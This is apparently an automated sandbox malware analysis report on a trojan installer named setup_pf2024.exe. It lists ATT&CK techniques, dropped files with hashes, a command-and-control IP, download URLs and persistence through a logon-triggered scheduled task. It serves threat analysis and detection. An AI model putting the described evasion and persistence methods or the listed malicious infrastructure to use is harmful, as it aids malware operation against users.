                    Source: Yara match File source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3728, type: MEMORYSTR
                    Source: C:\Users\Wegame\Wegame.exe Code function: 3_2_0044CC18 ?_Xlength_error@std@@YAXPBD@Z,?from_json@jsonbind@@YAHPAXABVValue@Json@@@Z,3_2_0044CC18
                    Source: C:\Users\Wegame\Wegame.exe Code function: 3_2_0044DC7C ?to_json@jsonbind@@YAHPAXAAVValue@Json@@@Z,3_2_0044DC7C

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 11 Input Capture | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | 2 Replication Through Removable Media | 2 Command and Scripting Interpreter | 1 Create Account | 1 Valid Accounts | 4 Obfuscated Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 11 Input Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Valid Accounts | 11 Access Token Manipulation | 1 Software Packing | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 12 Service Execution | 22 Windows Service | 22 Windows Service | 1 DLL Side-Loading | NTDS | 47 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Scheduled Task/Job | 12 Process Injection | 1 File Deletion | LSA Secrets | 61 Security Software Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Bootkit | 1 Scheduled Task/Job | 211 Masquerading | Cached Domain Credentials | 3 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Valid Accounts | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 3 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Bootkit | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |

Behavior Graph (ID: 1408805, Sample: setup#U67e5#U8be2_pf2024.exe, Startdate: 14/03/2024, Architecture: WINDOWS, Score: 100)
• Domains/IPs: tqos.wegamex.com.hk; ied-tqos.wegamex.com.hk; 2 other IPs or domains
• Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
• setup#U67e5#U8be2_pf2024.exe (started)
  • Contacted: bj.file.myqcloud.com 82.156.94.17, 443, 49699 ECLIPSEGB China
  • Dropped: C:\Users\wm.exe, PE32; C:\Users\Wegame\common.dll, PE32; C:\Users\Wegame\adapt_for_imports.dll, PE32; 6 other files (5 malicious)
  • Signatures: Drops PE files to the user root directory; Deletes itself after installation; Drops PE files with benign system names
  • Started: Wegame.exe; RuntimeBroker.exe; cmd.exe; kill.exe
• Wegame.exe
  • Contacted: ied-tqos.wegamex.com.hk 103.7.30.61, 8000 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China; tqos.wegamex.com.hk 103.7.30.83, 80, 8000 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China
  • Signature: Contains functionality to infect the boot sector
• RuntimeBroker.exe
  • Contacted: 154.91.65.2, 49701, 8000 IKGUL-26484US Seychelles
• cmd.exe
  • Started: conhost.exe
• kill.exe
  • Started: conhost.exe

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| setup#U67e5#U8be2_pf2024.exe | 53% | ReversingLabs | Win32.Trojan.FlyAgent | |
| setup#U67e5#U8be2_pf2024.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\ProgramData\RuntimeBroker.exe | 0% | ReversingLabs | | |
| C:\ProgramData\RuntimeBroker.exe | 0% | Virustotal | | Browse |
| C:\ProgramData\libcef.dll | 0% | ReversingLabs | | |
| C:\ProgramData\libcef.dll | 1% | Virustotal | | Browse |
| C:\Users\Statr\jli.dll | 3% | ReversingLabs | | |
| C:\Users\Statr\jli.dll | 6% | Virustotal | | Browse |
| C:\Users\Statr\kill.exe | 3% | ReversingLabs | | |
| C:\Users\Statr\kill.exe | 0% | Virustotal | | Browse |
| C:\Users\Wegame\Lua51.dll | 0% | ReversingLabs | | |
| C:\Users\Wegame\Lua51.dll | 0% | Virustotal | | Browse |
| C:\Users\Wegame\Wegame.exe | 0% | ReversingLabs | | |
| C:\Users\Wegame\Wegame.exe | 0% | Virustotal | | Browse |
| C:\Users\Wegame\adapt_for_imports.dll | 0% | ReversingLabs | | |
| C:\Users\Wegame\adapt_for_imports.dll | 0% | Virustotal | | Browse |
| C:\Users\Wegame\common.dll | 0% | ReversingLabs | | |
| C:\Users\Wegame\common.dll | 0% | Virustotal | | Browse |
| C:\Users\wm.exe | 0% | ReversingLabs | | |
| C:\Users\wm.exe | 0% | Virustotal | | Browse |

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| ied-tqos.wegamex.com.hk | 0% | Virustotal | | Browse |
| tqos.wegamex.com.hk | 0% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://ocsp.thawte.com0 | 0% | URL Reputation | safe | |
| 154.91.65.2 | 0% | Avira URL Cloud | safe | |
| http://www.google.comcefsimplestring | 0% | Avira URL Cloud | safe | |
| 154.91.65.2 | 1% | Virustotal | | Browse |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| ied-tqos.wegamex.com.hk | 103.7.30.61 | true | false | | unknown |
| bj.file.myqcloud.com | 82.156.94.17 | true | false | | high |
| tqos.wegamex.com.hk | 103.7.30.83 | true | false | | unknown |
| chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com | unknown | unknown | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| 154.91.65.2 | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown |
| https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txt | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://www.winimage.com/zLibDll1.2.5 | setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr | false | | high |
| https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtmF | setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002019000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.vmware.com/support/reference/common/info_tools.html. | setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr | false | | high |
| http://www.vmware.com/0 | setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, winPre2k.iso.0.dr | false | | high |
| http://crl.thawte.com/ThawteTimestampingCA.crl0 | setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.dr | false | | high |
| http://www.google.comcefsimplestring | setup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| http://www.symauth.com/rpa00 | setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr | false | | high |
| https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/ | setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://ocsp.thawte.com0 | setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.dr | false | URL Reputation: safe | unknown |
| http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a-s-f | setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr | false | | high |
| https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtl | setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246646530.0000000003A60000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.vmware.com/go/vcloud_login | wm.exe.0.dr | false | | high |
| http://www.vmware.com/0/ | setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr | false | | high |
| https://www.xiami.com/0 | setup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.dr | false | | high |
| http://www.google.com | setup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.dr | false | | high |
| http://www.winimage.com/zLibDll | setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr | false | | high |
| http://www.symauth.com/cps0( | setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr | false | | high |
| http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a | setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr | false | | high |
| https://curl.haxx.se/docs/http-cookies.html | setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr | false | | high |
| https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtPF | setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002019000.00000004.00000020.00020000.00000000.sdmp | false | | high |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 82.156.94.17 | bj.file.myqcloud.com | China | 12513 | ECLIPSEGB | false |
| 154.91.65.2 | unknown | Seychelles | 26484 | IKGUL-26484US | true |
| 103.7.30.61 | ied-tqos.wegamex.com.hk | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | false |
| 103.7.30.83 | tqos.wegamex.com.hk | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | false |

                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1408805
                                                              Start date and time:2024-03-14 08:45:10 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 25s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:13
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:setup#U67e5#U8be2_pf2024.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:setup_pf2024.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@11/16@5/4
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HCA Information:
                                                              • Successful, ratio: 83%
                                                              • Number of executed functions: 205
                                                              • Number of non-executed functions: 131
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target setup#U67e5#U8be2_pf2024.exe, PID 5224 because it is empty
                                                              • Not all processes were analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              Time | Type | Description
                                                              08:46:09 | Task Scheduler | Run new task: RuntimeBroker Config Logon Trigger Task path: C:\ProgramData\RuntimeBroker.exe
                                                              08:47:42 | API Interceptor | 1126x Sleep call for process: Wegame.exe modified
                                                              No context
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):848200
                                                              Entropy (8bit):6.314251035785333
                                                              Encrypted:false
                                                              SSDEEP:24576:Qh7U9b1uRuQL/3Vfvh6dW9qb+LIMQQ1LJA3l3sX51c:4495uRuQL/3Vfvh6djqLIMQOL6l8Pc
                                                              MD5:67EE3B7CA47FEC435EAB6DDE7AAEDCF7
                                                              SHA1:91BE7A2521C014B1AB5C2785C577D34FE6808D92
                                                              SHA-256:253A5232AB3F084BBAA49550B6C9EAE837A683B34548291D3DD1B13AEE2AF5A5
                                                              SHA-512:61270CED21150BED04CADB603CBEC313F771EF36A030EF3153F010A4D8966ED477AA7E226A91B4EF512528B0AE0033525F28D7E99EFE0197296EC5CF633B9D1A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33856
                                                              Entropy (8bit):6.688937579381936
                                                              Encrypted:false
                                                              SSDEEP:768:k7YBqjxHP09PYYiOD9QGOZndZeAYp9gd2KglQ95DDUf2h:zqMPJiODtOZ6dp9gEzQ953Uf
                                                              MD5:E6F634AB4CC71631374B232D8C646B09
                                                              SHA1:F2E91CEC97F008577DD567CCAD061CC9B9A41792
                                                              SHA-256:D4554FB4BA264A34B44541F95F5DAD8D5DFC3F9B3525407DD3EFC0A112344584
                                                              SHA-512:AE43E88547CD366471AC7CB25C8D7FD1AE883CD7FE013C87D65D38975DE5B1537FE33ED93CE70AB8819B702A8EAED3D53D4DA58355A1AA3B236667076E878D12
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):89092
                                                              Entropy (8bit):7.663879590395084
                                                              Encrypted:false
                                                              SSDEEP:1536:xUvwd0ymKlRPa9Sj0c9cWr8E2ntEpeMkZm6+LW4VhTQILcodYcxLlQKx:vd7lRP9Ic9ClaeMk9UW4V5XLVx
                                                              MD5:B2327A8E16382A4849592C215C4999A3
                                                              SHA1:36369369EC3C721C61B17CDA16DC74AEE4B451E4
                                                              SHA-256:069B440F8C99A98DD2421F45B307DC266C1342A9A87CAFC00D4A93FBD805471E
                                                              SHA-512:F8BC83F8D2F7EF5B7CAE74FABCB8EEA3EA548E58366A45597754B5EEC54B1848B5A9B4B0B5679E8832F063CE68256E4B4151AB84D8F8FC460719F60614BFE4AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):145984
                                                              Entropy (8bit):6.62050830630065
                                                              Encrypted:false
                                                              SSDEEP:1536:0YOsQfViRGpZDcQJUd+AXfY3BHSvDk8nWKI53/+XK5jiWW3Hj/9gEzQ953Uf:0AQfYQ4xxAYvDk8w3W+jiWMHW
                                                              MD5:E3351B7A306463B37F51A7A9A4ACC2C5
                                                              SHA1:AA7018C4A38DCA47FD167B985E70DE0C10B0154D
                                                              SHA-256:03A8B5BFC72ABDA1ED6D197D9F77B20AE9CAA229A1573BA04441553ADD0DDB28
                                                              SHA-512:E1BAC46FD29934B42F3BF6AA5999F41780B54F79775CA81F63DF43FEA96AB5E5527FABF991C692C0A60C266E2D389627CBF895CF9BBC9DDDED8068686951A643
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              • Antivirus: Virustotal, Detection: 6%, Browse
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15968
                                                              Entropy (8bit):6.475201750590772
                                                              Encrypted:false
                                                              SSDEEP:384:GpsDs5hnRv7NmSHhV8xxeeh4Szv4nYPLr7dV6:GpsynGS/8x4ehJ4C7dQ
                                                              MD5:D94C31E9C9C9A1273CC67DC6FFAF9984
                                                              SHA1:CF2A10355DD3944EAF53A238A202B0750AB4F374
                                                              SHA-256:E581839F59964E4E4D837D935AC262756A466FAC1C0F03ABA0CC83B90ED0CF11
                                                              SHA-512:0C9C2A99D57BB69C809010D33FB3C740517F9FD3025ED0F75B1D895B162488D744D6106C4E32BF208DDF66E38CC0F6D5CA6C8E7C6A09F9D15F3D035759962E1E
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):220360
                                                              Entropy (8bit):6.732487562081231
                                                              Encrypted:false
                                                              SSDEEP:3072:TNFyI9SNhV6uAePSIGvUoQWyPZ/hNqicLwOVGSa8agpQo+YbzdHoWwK2G:TNl9SNdPSJUZtZ/jq3LwuaOddwG
                                                              MD5:34C2C19F612B0424FA1A0168557C263C
                                                              SHA1:C0F790E1FD123A4ED002B1A0D81DA65AD47B327F
                                                              SHA-256:9AAC0868A5C207125CF635A2507BFBFD9593A98246B5E8BF0445B3008B82C00D
                                                              SHA-512:8EBE3DB384F3C7F7A36872AB02F42798A1391872AD3AF76A3C6A465BC9D708ABA4C05507A19D4A20B0D28941936CD80E8EE40DBC3EA46BE34A0AD6E41B440F93
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1467272
                                                              Entropy (8bit):6.174089075905822
                                                              Encrypted:false
                                                              SSDEEP:24576:Q+pcV+KOYOBf0gjk6PMopYX0ja7TxCYOIb4ku0PQGGL0xkFeyD6Rt:GOBf5jk6PMopCga7Twpk2GGAcPDm
                                                              MD5:6B54CAC74E2C36E9A34563018CE99AEA
                                                              SHA1:6FDDE9C794FE39624531DD444A020AC1015FA6B4
                                                              SHA-256:6698E7514F07463C766CCFE1411F4385E1BB30E73D275BEF3DF09F39AF2E3B74
                                                              SHA-512:9627CD808C86869246EE504EE2CA117615536C22CA8F22DD13E631403BEA465A99E3C90A32BD40C2E641A969473976AE194BBF613CA8B9667225D38BF700310D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):414600
                                                              Entropy (8bit):6.498295775240253
                                                              Encrypted:false
                                                              SSDEEP:6144:S+rceBUknAFTJ7HDTpBgDqWQVgAOUqiQtwAUCnGExEakNITzHZkTUDv8XqooktqZ:By9dOwmEbokP9rfCQ5nNnuGMtd
                                                              MD5:AD13D8F6D32C21599293D230456FED48
                                                              SHA1:1667B22D9DFD2A70D8F7407A6A64F248F163C993
                                                              SHA-256:C3958B006E02D9D96CDDA10065398F9E9A4CE30CA98582B57EF2A2FEDD94589F
                                                              SHA-512:8FA40E638C724E5032CDFC936D7FC024162B68454D3BA7722D5DDFA54B076CE94817C4C965FA1F491D175C983993B2BBD897CAF649C0BC0A4AE5A9FD552B8E23
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3926408
                                                              Entropy (8bit):6.768160202258329
                                                              Encrypted:false
                                                              SSDEEP:98304:0/HqH+mi3P9HwtWswIhLp+ag/B6zSoq18a:Qmi3PZOw6uJ8a
                                                              MD5:82264D93560913DC2E97C3026CB10D43
                                                              SHA1:9350F07A39624306628283DF7C8FBB0A6BE6DFA4
                                                              SHA-256:E1D02970B3CCF2CC4F702D9AFAA2329D9C6D5C1EC4CE845A10FDD172B4AF8452
                                                              SHA-512:537547C1F0D7B82CFB1EFEED8FD04001D167A7EA25F404E025FDAA5F35998C7662F6309E8560E970127872CCDF5B619BE63BC5AFF12974238FC5E171B1ABE732
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Process:C:\Users\Wegame\Wegame.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):270
                                                              Entropy (8bit):5.810145202540528
                                                              Encrypted:false
                                                              SSDEEP:6:7/EOQLxgYqTxMs+oMU/mR1ylTKTK/fI7Se:AOQLxgYAxJyU/mWN/fGb
                                                              MD5:C53A5DE62E6B0261028E0997C0204392
                                                              SHA1:B3549ABBB234F2916BB95E1372C2C8BB12098CE7
                                                              SHA-256:8CB0F4C1D0DD33DFDECF3A7102A29EC76A66C703B4A7FA7F361D49868C32E7AA
                                                              SHA-512:C2FF584313C30C2C67CB67483B0882A1B530D1469C50E70F544B846502EE7B111B4C9B0FDF9E447ACA85D0DC1564599AD1D1EB35309D362763673E477D504896
                                                              Malicious:false
                                                              Reputation:low
                                                              Process:C:\Users\Wegame\Wegame.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):3145890
                                                              Entropy (8bit):0.0518194268647698
                                                              Encrypted:false
                                                              SSDEEP:192:AC0DBGLDBG9itx8Qiw8QgO/PBPKWRmqyeppIsyk5uZAa+LBSjSpcg1gszaH:AqX8Qb8Ql/PY7RepX5u2/d
                                                              MD5:2AA6B637F2824121B4FD1EBC130889ED
                                                              SHA1:EE9F749227EBE42D7159FA1527D762AED451C367
                                                              SHA-256:D81637B1DAFD2EC2E920B2E8148B0ED8B4E59CD437037CB2730CD3FCEA9DE9B5
                                                              SHA-512:CAB6606C1C0D2D2CAE8A9F7CC26D969E4AE607C2C45CC99070B553693C2DE151C31D16C8E51DAEFF8A0A03EF7AD3F067402E694836467A3993071F9F3A23D2CD
                                                              Malicious:false
                                                              Process:C:\Users\Wegame\Wegame.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):190
                                                              Entropy (8bit):4.549634503611027
                                                              Encrypted:false
                                                              SSDEEP:3:LDIdyGK3M+TUQAyiKRczQgWtBG8uU9TqMm9HwXoveeWGhBAu2sTHPzLreKvRiQGU:3TpzW85C8uUxqMm9HiovhAu2sL5pG5gz
                                                              MD5:0277A614F1920297776722D55C95E301
                                                              SHA1:E3D145F789C25496088CB7AAD5775032AEB79DBC
                                                              SHA-256:4291DE1FA6F15EEA9DCDCCA459ED331FC16CF40544C71F1190A620C83982661D
                                                              SHA-512:B2BA2705C6BD3BF08E3A71CC4214AAA76FCB1D67FC8C7103327DB968EDBBBF89C98691EBB32E9B01BA4FD0D66CBCB8C4CD6E6C67CC55F6B2162F889FD7D33997
                                                              Malicious:false
                                                              Preview:[Profile]..config1=f62a5e744c552f343904cb537e5e7581..config2=c03ffea51228692909f5ef02221df8f2..config3=b67877e560c996244de0ab3986b605ed..config4=1b3d82ff206f2697db14bb5ee90b3a8d..config5=1..
                                                              Process:C:\Users\Wegame\Wegame.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16
                                                              Entropy (8bit):2.9056390622295662
                                                              Encrypted:false
                                                              SSDEEP:3:pHiQn:pHiQ
                                                              MD5:6A1DFC0D8ABB3A058CB3631ADE153B29
                                                              SHA1:8E4FFD497561F647A238A5E1B0418A77A5B657F2
                                                              SHA-256:4F89883852B6EFD64B125DE85357C68D8B9C6A80B38721822E2D7979787D5E4A
                                                              SHA-512:6B3DD19F5A55563A65916C7A9B05C06E772628342330D989E6A1AF8C80B5C6466FCEF97306FEC7B3F8964769BE2676CF6B05303771F1ABBCA6F9FC42ED07D058
                                                              Malicious:false
                                                              Preview:..........-.;...
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:ISO 9660 CD-ROM filesystem data 'VMware Tools'
                                                              Category:dropped
                                                              Size (bytes):14090240
                                                              Entropy (8bit):7.81869955057579
                                                              Encrypted:false
                                                              SSDEEP:196608:mmVf72aQA1oMuWr45hrr2NVZMalqmr2lZXZ9fObDhoBjd9SuoWShEMyL2i:J7x/eJWGhrr2NCvZFObNWjqRWpMy
                                                              MD5:FB4FB91C4050A6242B5AF3DE33D328E6
                                                              SHA1:4FE0AE10ED5958A13217A4BA1B51FFD13657A9FE
                                                              SHA-256:A17A11D65F841D213FFC2D6681ACDF849C380E77055334C7A8127C1373991EBB
                                                              SHA-512:9FC21F70509C38A519074DA2971837E384FD662CA9193AA461C1540E42E4D7395746B278151AAF38C111B21B396F90460F6AE4906F41C19107C8174CD0F8F54C
                                                              Malicious:false
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2230488
                                                              Entropy (8bit):6.444506157324094
                                                              Encrypted:false
                                                              SSDEEP:49152:/g6aruf8oI6r9soETeat69lUuTFHSfR66Bmt0VlJdxz7:/g6ar48f6RCTeatduM
                                                              MD5:88F727E19A3DA38FF06CADAF54CE8231
                                                              SHA1:71EDD1E0219AA3B57093C6E1FFB0B1E0E610B614
                                                              SHA-256:9E867F40B3127273A637748D546771A1BAA4EAB48F7CCB11273F81CECD24FB97
                                                              SHA-512:35692E943F919D41399DCEE0DF07AAAFAF5E4E6ABA29014A6311F971DE5BAAA75A85C8A0ECF68E3BD7E96254AF777B62ECB46027F36B015A9358563839FF1909
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):56
                                                              Entropy (8bit):4.530855931783247
                                                              Encrypted:false
                                                              SSDEEP:3:oNN2+WWARjTdzLNy:oNN2RWIPy
                                                              MD5:38A78E76DC2906AD16993785956103E4
                                                              SHA1:EC4BA05E28D0FB638194228E8F91F793D10BBD76
                                                              SHA-256:C95114B645D792B52FE8F88DF9931DFA49D0F78ED9948C7607EF8D0115B9A790
                                                              SHA-512:183C75A83C2187CBB7682AB769E89791CAE99ABF885C01CA6931202E98894A64DE37E51B88EF5AF867FA5F4B5D9CAA498813580469F9266E4ECDA6A0B7FED7CE
                                                              Malicious:false
                                                              Preview:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe..
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.465976192228382
                                                              TrID:
